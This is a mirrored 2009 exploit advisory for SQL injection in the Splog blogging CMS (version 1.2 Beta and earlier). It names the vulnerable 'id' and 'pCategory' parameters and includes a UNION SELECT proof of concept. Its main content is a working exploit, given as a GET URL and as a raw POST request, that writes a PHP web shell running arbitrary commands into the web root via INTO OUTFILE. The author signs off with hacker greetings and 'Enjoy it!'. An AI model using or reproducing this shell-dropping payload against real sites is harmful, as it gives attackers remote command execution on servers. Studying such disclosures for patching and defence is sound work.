Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:22023
HistoryJun 14, 2009 - 12:00 a.m.

MULTIPLE SQL INJECTION VULNERABILITIES --Splog <= v-1.2 Beta-->

2009-06-1400:00:00
vulners.com
14

MULTIPLE SQL INJECTION VULNERABILITIES --Splog <= v-1.2 Beta–>

CMS INFORMATION:

–>WEB: http://sourceforge.net/projects/splog/
–>DOWNLOAD: http://sourceforge.net/projects/splog/
–>DEMO: N/A
–>CATEGORY: CMS / Blogging
–>DESCRIPTION: Splog is a simple PHP and MySQL blogging framework allowing
full integration into a website by being designed for use…
–>RELEASED: 2009-06-01

CMS VULNERABILITY:

–>TESTED ON: firefox 3
–>DORK: N/A
–>CATEGORY: SQL INJECTION
–>AFFECT VERSION: <= 1.2-Beta (Checked previous versions are also vulns)
–>Discovered Bug date: 2009-06-08
–>Reported Bug date: 2009-06-09
–>Fixed bug date: 2009-06-10
–>Info patch (1.3): http://sourceforge.net/projects/splog/
–>Author: YEnH4ckEr
–>mail: y3nh4ck3r[at]gmail[dot]com
–>WEB/BLOG: N/A
–>COMMENT: A mi novia Marijose…hermano,cunyada, padres (y amigos xD) por su apoyo.
–>EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!)

#########################
////////////////////////

SQL INJECTION (SQLi):

////////////////////////
#########################


PROOF OF CONCEPT:

<<<<---------++++++++++++++ Condition: magic quotes=OFF/ON ++++++++++++++++±-------->>>>

[++] GET var –> 'id'

[++] File vuln –> 'post.php'




&lt;&lt;&lt;&lt;---------++++++++++++++ Condition: magic quotes=OFF +++++++++++++++++---------&gt;&gt;&gt;&gt;


[++] POST var --&gt; &#39;pCategory&#39;

[++] File vuln --&gt; &#39;display.php&#39;


POST http://[HOST]/[PATH]/display.php HTTP/1.1
Host: [HOST]
User-Agent: Mozilla/5.0 &#40;Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.10&#41; Gecko/2009042316 Firefox/3.0.10
Referer: http://[HOST]/[PATH]/display.php
Content-Type: application/x-www-form-urlencoded
pCategory=-1&#39;+UNION+SELECT+1,2,3,4,5,6# &lt;--- INJECTION


[++[Return]++] ~~~~~&gt; user, version or database.


----------
EXPLOIT:
----------


&lt;&lt;&lt;&lt;---------++++++++++++++ Extra-Condition: privileges to create files +++++++++++++++++---------&gt;&gt;&gt;&gt;


[GET]~~~~~&gt; http://[HOST]/[PATH]/post.php?id=-1+UNION+ALL+SELECT+&#39;&lt;HTML&gt;&lt;title&gt;SPLOG &lt;= 1.2 Beta--SHELL BY
--Y3NH4CK3R--&gt;&lt;/title&gt;&#39;,&#39;&lt;body text=ffffff bgcolor=000000&gt;&lt;center&gt;&lt;h1&gt;YOUR SHELL IS ON!&lt;br&gt;&#39;,&#39;&lt;/h1&gt;&lt;/center&gt;&lt;br&gt;&lt;br&gt;&lt;font
color=ff0000&gt;&lt;h2&gt;Get var &#40;cmd&#41; to execute comands. Enjoy it!&lt;/h2&gt;&#39;,&#39;&lt;/font&gt;&lt;h3&gt;Command Result:&lt;/h3&gt;&lt;?php
system&#40;$_GET[cmd]&#41;; ?&gt;&#39;,&#39;&lt;br&gt;&lt;br&gt;&lt;font color=ff0000&gt;&#39;,&#39;&lt;h3&gt;By y3nh4ck3r. Contact:
[email protected]&lt;/h3&gt;&lt;/font&gt;&lt;/body&gt;&lt;/HTML&gt;&#39;+INTO+OUTFILE+&#39;[COMPLETE-PATH]/shell.php&#39;&#37;23

[POST]~~~~~&gt;

POST http://[HOST]/[PATH]/display.php HTTP/1.1
Host: [HOST]
User-Agent: Mozilla/5.0 &#40;Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.10&#41; Gecko/2009042316 Firefox/3.0.10
Referer: http://[HOST]/[PATH]/display.php
Content-Type: application/x-www-form-urlencoded
pCategory=-1&#39;+UNION+ALL+SELECT+&#39;&lt;HTML&gt;&lt;title&gt;SPLOG &lt;= 1.2 Beta--SHELL BY --Y3NH4CK3R--&gt;&lt;/title&gt;&#39;,&#39;&lt;body text=ffffff
bgcolor=000000&gt;&lt;center&gt;&lt;h1&gt;YOUR SHELL IS ON!&lt;br&gt;&#39;,&#39;&lt;/h1&gt;&lt;/center&gt;&lt;br&gt;&lt;br&gt;&lt;font color=ff0000&gt;&lt;h2&gt;Get var &#40;cmd&#41; to execute
comands. Enjoy it!&lt;/h2&gt;&#39;,&#39;&lt;/font&gt;&lt;h3&gt;Command Result:&lt;/h3&gt;&lt;?php system&#40;$_GET[cmd]&#41;; ?&gt;&#39;,&#39;&lt;br&gt;&lt;br&gt;&lt;font
color=ff0000&gt;&#39;,&#39;&lt;h3&gt;By y3nh4ck3r. Contact:
[email protected]&lt;/h3&gt;&lt;/font&gt;&lt;/body&gt;&lt;/HTML&gt;&#39;+INTO+OUTFILE+&#39;[COMPLETE-PATH]/shell.php&#39;# &lt;--- INJECTION


[++[Return]++] ~~~~~&gt; Your shell in http://[HOST]/[PATH]/shell.php




#######################################################################
#######################################################################
##*******************************************************************##
##  SPECIAL GREETZ TO: Str0ke, JosS, Ulises2k, J. McCray, Evil1 ...  ##
##*******************************************************************##
##-------------------------------------------------------------------##
##*******************************************************************##
##              GREETZ TO: SPANISH H4ck3Rs community!                ##
##*******************************************************************##
#######################################################################
#######################################################################